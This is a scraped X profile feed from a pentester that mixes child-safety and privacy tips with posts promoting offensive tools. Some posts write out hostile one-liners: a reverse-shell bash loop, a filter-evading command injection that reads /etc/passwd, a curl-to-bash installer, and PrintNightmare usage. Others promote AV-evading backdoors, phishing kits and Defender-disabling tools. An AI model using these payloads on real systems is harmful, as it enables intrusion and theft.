Ryan M. Montgomery
@0dayCTF
Followers
97K
Following
7K
Media
218
Statuses
1K
Pentester / Serial Entrepreneur / Child Safety Warrior — https://t.co/9c4DBWMYiQ
Joined May 2008
This lightbulb can monitor your network, steal your password, and much more. How would you detect something like this? Stay safe!
109
2K
6K
Remove your data from Google listings with this simple trick. This will not remove your data from the original source but will make it a bit harder to find.
76
967
5K
Public WiFi networks should never be trusted. Stay safe!
43
466
3K
How “autofill” can steal your personal information. This vulnerability has been around for over 8 years. Stay safe!
54
523
3K
Easily discover your digital footprint, and see your exposed data. Stay safe!
44
348
2K
LinWinPwn - Active Directory Vulnerability Scanner.-.Scan with the help of impacket, bloodhound, crackmapexec, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, and more. -.Repo: -.-.#CyberSecurity #infosec #CTF #windows #AD #bugbountytips
31
589
2K
Disgusting communities on Roblox. 2/3 of kids aged 9-12 play this game. -.Last I checked there’s over 75 million active users (kids) on this game 🤯 . If you have any questions, please leave them below. Stay safe!
81
419
2K
CVE-2024-1086 (Local Privilege Escalation) .-.While the xz backdoor was all over the place, this incredible exploit seemed to "slip" by!.-.This is working on most Linux kernels from 5.14 to v6.6.-.Repo: -.Creator: @notselwyn
17
441
2K
Very innocent looking “toy” that survives on WiFi networks. It’s a hacker’s Tamagotchi 😀
48
200
2K
Permanently blur your house on Apple Maps. Stay safe!
28
202
2K
Can social media correct what the media failed to do? Almost our entire country’s Social Security numbers were breached, yet many local news sources didn’t run the story. Make sure to help your friends and family freeze their credit & share. Stay safe!
50
415
2K
You can check to see if your children have accounts that you were unaware of. Stay safe, and please share this video. #ProtectTheChildren
39
325
1K
Detect hidden cameras & listening devices with this cheap gadget. Stay safe!
26
232
2K
Ridiculously fast DNS/Network/Port Scanner - (Skanuvaty)🤯.-.In testing, I was able to discover 1000's of subdomains in less than 20 seconds. Check the repo for more info! .-.Repo: -.Creator: @Esc4iCEscEsc .-.#CyberSecurity #bugbountytips #CTF #infosec
45
451
1K
Photos can now be located from within your house. Stay safe!.-.-.I’d love to hear your thoughts on this. The goal is to put this in the hands of LE, and this will be very helpful for many cases.
69
273
1K
If you've found an OS command Injection with WAF enabled, special characters like (/"'&|()-;:.,`) and whitespaces blocked. Try this method to bypass. -.E.g.: reading /etc/passwd file:.cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??.-.Credit: Aysar Harb.-.#cybersecurity #pentesting
12
517
1K
Never plug-in random flash drives, this USB Rubber Ducky can do a ton of damage. Stay safe! .-.-.Thank you to Robot at HackNexus for helping with this wild script!
26
227
1K
SQLi Authentication Bypass - Master List (2022).-.I've gathered a ton of payloads from various sources, load these into your favorite fuzzing tool 🚀.-.Link: -.-.#cybersecuritytips #infosec #CTF #bugbountytips
22
354
1K
@WallStreetApes Thanks for sharing my video, I’m not really into political stuff for obvious reasons. If you’re interested in children, I don’t care which party you’re affiliated with! Stay safe 🙏🚀.
55
92
1K
@_JohnHammond & I at the people’s call center exposing a scammer. We had a great and successful week! Thank you @ScammerPayback 🙏❤️🚀
32
75
1K
🚨 Holiday Giveaway Alert! 🚨.I’m giving away TryHackMe Vouchers and merch! 🎉. Prizes:. 🥇 10 x 12-month TryHackMe subscriptions.🥈 15 x 6-month TryHackMe subscriptions.🥉 25 x 3-month TryHackMe subscriptions.💸 $100 TryHackMe merch store voucher. How to Enter:. 1️⃣ Follow me on.
330
434
1K
Finally got to meet the owners of TryHackMe, very humble and great people. Defcon 31 has been incredible 🙏🚀 @RealTryHackMe
19
49
1K
The fastest directory bruteforcer out there. I hate to say goodbye to Dirb & Gobuster, but it's time 🙏.-.-.#bruteforce #ctf #cybersecurity #rust #dirbusting #lfi #hacking #cybersecuritytips #BugBounty #tryhackme
28
396
1K
Best SSRF Bypass List (2022).-.Copy ALL headers and paste in your request. -.List: -.-.#cybersecuritytips #CyberSecurity #CTF #bugbounty #bugbountytips
38
377
1K
This is called an “Evil Twin” attack, I’m sure most of you have seen a pop-up when connecting to some networks. Make sure not to enter any personal details! Please leave any questions below. -.Please share the message 😀
28
226
968
AORT - Automated Recon (easy to use).-.Checks for subdomains, ports, whois, emails, waybackmachine, DNS, and more.-.Repo: -.Creator: @D3Ext .-.#cybersecuritytips #infosec #bugbountytips #CTF #recon
22
256
899
I was proxying traffic from a mobile crypto app called "Pi", I noticed that 3700 of my contacts were being uploaded to their server and are stored/searchable. -.Any explanation @PiCoreTeam? .-.#cryptocurrency #picoin #cryptocurrencies #altcoin #minepi #cybersecurity #crypto
89
231
870
This is how a hacker can access your house without leaving a digital trace. Obviously this was done with the permission of the home owner. -.Stay safe!
43
209
882
WiFi Exploitation Framework (WEF).-.Supports most WiFi Attack Vectors & Bluetooth support (Jamming, Reading, Writing).-.Repo: -.Creator: @D3Ext .-.#infosec #CTF #BugBounty #CyberSecurity
19
282
883
Millions were presented with this fear inducing extortion threat, it’s important to let your loved ones know it’s not real. Stay safe!
24
184
887
If your child plays Minecraft, I would highly suggest monitoring them. This investigation will continue, I’ll keep you updated. -.I’m aware some adults play, this video was intended to educate parents on the terrible communities that are easily accessible. Stay safe!
32
288
847
SpoolSploit - Auto Exploit Windows🚀.-.A collection of Windows print spooler exploits containerized with other utilities for practical exploitation. -.Repo: -.-.#infosec #cybersecurity #windows #CTF #bugbountytips
13
222
835
People are creating “revealing” AI photos of children online, stealing them from public profiles. Stay safe!.-.-.This is my second time posting about this issue, the problem has only gotten worse.
35
267
790
This is a follow up to my original video demonstrating the BLE beacon spam. This attack is causing a complete denial of service (crash) on the latest iOS / devices. You can do this with less than $10 in equipment. -.Credit for “Sour Apple” dev to @WillyJL_ , ECTO-1A, and Xtreme
37
152
764
I want to address this “#1 Ethical Hacker In The World” thing. I’m not claiming to be the best hacker to ever live, nor did I choose/review the title of that podcast. They chose the title from from my ranking on TryHackMe, it’s social media! 🤷♂️ #ProtectTheChildren.
64
32
755
Google is listening after claiming it’s “disconnected” 😂 — @GeminiApp you have some bugs to iron out but overall I’m very impressed with Gemini 2.5.
52
120
792
Can someone please explain why people are praising this shooter? Regardless of your beliefs in the healthcare system, he killed a man with a family.
116
36
768
Some advice that made me who I am today 😀 .-.@trilogymediainc interviewed me, should they release the full thing?
35
137
749
OSINT Challenge.-.Send me coordinates within 100ft of where I’m standing and I’ll send you $100 😀
174
49
740
This charger can wirelessly give anyone full access to your device. Stay safe!.-.-.Like I said in the video, to be extra safe you can get a USB data blocker. I used the OM.G cable for this demonstration. Leave any questions below.
24
141
736
@iluminatibot That’s the first time I’ve ever been called an IT guy 😂. Thank you for sharing, I appreciate it!.
48
28
715
This is the beginning of my journey, many things happened prior to this, to make all of what has happened this year possible. It’s crazy to think that a single text message would change my life and allow me to do what I was called to do in a way bigger way.
47
152
690
@ShawnRyan762 I’m glad we have a platform where information like this can be spoken about transparently.
19
23
679
It was an honor being on your show @patrickbetdavid 🙏.-.Check it out here:.
🚨Set your reminder now!. "Security is an Illusion" - Ethical Hacker Exposes Child Predators & Tools To Protect Against Hackers. The episode goes live at 9 AM EST today.
65
74
674
@DrDisrespect There is no excuse for this, even on my worst day, you’d never see me talking to a child….
45
25
627
Are your children using apps / websites to chat with strangers?.-.Obviously, I did not want to name any of these sites in the video. I would recommend checking their browser history or having a conversation with them. Stay safe!
32
143
669
Automatically Bypass 403 Pages (a ton of methods).-.This script will test for URL bypasses, to reach a 40X protected page / endpoint. -.Repo: -.Creator: @TheLaluka .-.#infosec #CyberSecurity #CTF #bugbountytips #bugbounty
15
201
642
Cerbrutus - (SSH Bruteforcing).-.Much faster & reliable than any other existing solutions. We've tested it against Hydra with over a 200% speed improvement. (SMB, FTP, HTTP, coming soon!).-.Repo: -.#CyberSecurity #CTF #BugBounty #bugbountytips #infosec
9
268
639
ChatGPT Filtering Christianity?.-.Regardless of your beliefs, I personally don’t think this is right. What are your thoughts?
83
108
624
ChopChop - Quickly Discover Sensitive Endpoints/Files/Folders.-.Repo: -.Creator: @michelin_eng .-.#cybersecuritytips #CybersecurityNews #bugbountytips #ctf #infosec
5
214
600
Fuxploider - File Upload Vulnerability Scanner.-.This tool automates the process of detecting and exploiting file upload forms flaws. -.Repo: -.#CyberSecurity #infosec #CTF #BugBounty #bugbountytips
4
256
590
SSRFire - Automated SSRF Finder.-.Tool to automate SSRF discovery with extra features to find XSS / Open Redirects. -.Repo: -.#infosec #CyberSecurity #CTF #BugBounty
3
172
575
File Upload Bypass - Embed PHP in your photos!.-.Created by @NinjaJc01 .-.-. #ctftools #ctf #hacktricks #cybersecuritytips #imagepayload #uploadbypass #hacking #bugbounty #tryhackme
7
216
559
@ShawnRyan762 @ShawnRyanShow Love you back man! Thankfully we’re both not in jail today 😂🙏.
10
8
579
Malicious PDF Generator☠️ (Great for Red Teaming).-.Generate multiple pdf files with phone-home functionality. Can be used with Burp Collaborator or -.Repo: -.Creator: @jonasl.-.#CyberSecurity #infosec #bugbounty #CTF
6
201
562
I’d really love to hear your opinion, this makes me sick. Stay safe!
263
107
534
@hackerfantastic I contributed the gas price captures in that repo, it only affects certain display models and not the actual pump itself. See video:
10
64
537
ZPhisher GUI - Interactive Phishing.-.See results in real time from targets of your phishing campaign, use the templates provided or easily create your own. -.Repo: -.Usage: -.Creator: htr-tech.-.#CyberSecurity #Pentesting #CTF
9
160
545
Scan all ports in 3 seconds & automatically send them to nmap. -.RustScan - .-.Created by: .@bee_sec_san.-.#tryhackme #rust #portscanning #ctf #pentesting #cybersecurity #cybersecuritytips #bughunting #bugbounty #rustscan
13
162
538
This app is incentivizing children to send pictures to strangers for money, if you see it please remove it immediately! Stay safe.
31
224
517
@armygir36701799 Thank you for sharing the podcast @ShawnRyan762 and I did. We appreciate it #protectthechildren .-.@ShawnRyanShow .-.To watch the entire thing
33
136
478
Bypass WAF / Restrictions with REcollapse.-.This tool assists in blackbox regex fuzzing to bypass validations and discover normalizations in web apps. -.Repo: -.Creator: @0xacb (Also thanks to @Hacker0x01).-.-.#infosec #cybersecurity #CTF #bugbountytips
18
143
484
Reverse Shell Bash Loop:.-.while true; do sleep 5 && mknod /dev/shm/p p; cat /dev/shm/p | /bin/bash -i | nc 127.0.0.1 9001 >/dev/shm/p; done.-.#CyberSecurity #CTF
7
126
458
Log files to check for valuable information & clear system logs. -.Here is a small list of UNIX locations to modify/view while you're on a machine. -.#CyberSecurity #infosec #CTF #bugbounty
4
122
464
I did NOT find “NASA Alien photos on the dark web”. -.Someone sent me this video. I’m assuming it was AI-generated, but the thumbnail is hilarious. 😂 .
60
31
479
CMSMap - All-in-One Scanning/Exploitation Tool.-.This tool scans for common vulnerabilities in different types of CMS platforms. -.-.Repo: -.Creator: @DionachCyber .-.-.#infosec #CTF #bugbountytips #cybersecurity
8
122
458
It’s unbelievable how many people are defending Dr. Disrespect. I went through some comments on his most recent post. He was talking inappropriately & intending to meet up at TwitchCon with a minor… Twitch employees leaked that information and he admitted to it. Nuff’ said!.
38
39
436
Sploitus - Exploit Database.-.All PoC's are converted to Markdown, and easy to navigate. -.Website: -.#infosec #CyberSecurity #CTF #Exploit
6
161
457
Please be kind to anyone that is requesting help and asks a detailed question. I've just witnessed some serious toxicity in a Discord Server. We've all been a "noob" in certain aspects at one point in our lives, please be mindful of that❤️Hope you all have a great day!.
23
70
444
HoaxShell (Encrypted Reverse Shell).-.Currently undetected by Windows Defender, based on HTTPS traffic & supports SSL. Easy to use!.-.Repo: -.Creator: @t3l3machus .-.-.#cybersecurity #infosec #CTF #bugbountytips #cybersecuritytips
18
130
434
X went down, so reposting this!.
Photos can now be located from within your house. Stay safe!.-.-.I’d love to hear your thoughts on this. The goal is to put this in the hands of LE, and this will be very helpful for many cases.
19
77
456
Easily Decompile APK's & Scan For Vulnerabilities.-.QuadraInspects framework integrates Andropass, APKUtil, and MobFS to automatically analyze APK files. -.Repo: -.Creator: @Morpheuslord2 .-.#infosec #bugbounty #bugbountytips #CTF #cybersecurity #apk
7
123
408
How you can lose everything including your privacy in 2023/24, with no technical knowledge. This includes your banking information, social media, passwords and so much more. Stay safe!.-.-.In short & it may sound obvious but don’t share your pin or phone with anyone!
8
80
386
MSFVenom Payload Crypter - Bypasses Windows Defender.-.Repo: -.Creator: @q8fawazo .-.#CyberSecurity #cybersecuritytips #infosec #bugbounty #bugbountytips #AVEvasion #AVBypass #tryhackme
5
171
399
Villain - (Undetectable Backdoor Generator).-.Villain has a built-in auto-obfuscate payload function to assist in bypassing AV. Payloads are currently undetected.-.Repo: -.Creator: @t3l3machus .-.-.#CyberSecurity #infosec #CTF #windows #bugbountytips
7
126
389
Protect the Children!. I’m honored to be the 100th guest on @ValuetainmentTV & @VincentOshana podcast “Unusual Suspects”.
30
74
395
StopDefenderService - Using TrustedInstaller.-.This project stops the Windows Defender service via token impersonation. -.Repo: -.#infosec #cybersecuritytips #cybersecurity #ctf #windows
2
127
391
6
113
382
I hope everyone has a great day, keep spreading positivity ♥️🚀🙏.
44
18
375
Beginners Guide to Nmap (Cheat Sheet).-.Blog: -.Author: Aksheet V.-.#CyberSecurity #InfoSec #CyberSecurityTips #BugBounty #PortScanning #nmap #CTF
5
135
386
Spraykatz is able to retrieve credentials on Windows machines & Active Directory. -.Repo: -.Credit: @aas_s3curity.-.#CyberSecurity #BugBounty #ActiveDirectory #WindowsHacking #CTF #InfoSec #SprayKatz #AVEvasion
4
140
372
One of many trolls out there, I pray I never get this miserable. It doesn’t matter what I say, people will find a reason to hate. -.Jay Z said it best “Some people hate”.-.#ProtectTheChildren
77
9
353
Install all basic Pentesting tools with a single cURL command.-.curl --proto '=https' --tlsv1.2 -sSf | bash.-.Created by: @_superhero1 .-.#tryhackme #bash #hacktools #ctf #pentesting #cybersecurity #cybersecuritytips #bughunting #bugbounty #superhero1
2
99
354
Python Obfuscator - Creates a FUD One Liner.-.The example below is with PentestMonkey's PHP Shell, this also bypasses Windows Defender with Python Meterpreter. -.Repo: -.Creator: @SpicysoulsV .-.#CyberSecurity #CTF #BypassAV #Python #bugbountytips
3
118
337
pwncat:.-.Repo: -.Creator: @calebjstewart .-.#cybersecurity #cybersecuritytools #ctf #pwncat #netcat #reverseshells #bindshells #ssh #enumeration #recon
10
88
339
autoSSRF (Automatic SSRF Testing).-.Smart fuzzing on relevant SSRF GET parameters and Context-based dynamic payload generation.-.Repo: -.Creator: @Th0h0 .-.-.#CyberSecurity #bugbountytips #infosec #CTF #tools
6
106
332
CVE-2021-1675 - PrintNightmare LPE (PowerShell).-.Usage:.Import-Module .\cve-2021-1675.ps1.Invoke-Nightmare -DriverName "HP" -NewUser "0day" -NewPassword "LulSpool" .-.Repo: -.Creators: @calebjstewart @_johnhammond .-.#CyberSecurity #CTF #bugbountytips
5
108
308
Bypass XSS Filters :P.-.-.#XSS #BugBountyTips #BugBounty #InfoSec #BugBountyTip #CTF #TryHackMe #BypassWaf #CyberSecurity
4
120
306
Any keyboard can steal all of your data. This is especially important for air gapped systems. Stay safe!.-.-.I kept the video short for a proof of concept, if anyone has any questions leave them below.
23
60
294
The @ShawnRyanShow was an incredible opportunity to educate parents and help children. Shawn and his team are incredible at what they do, I apologize if anyone was offended by the title. The important part is that we are making a difference 🙏.
22
14
289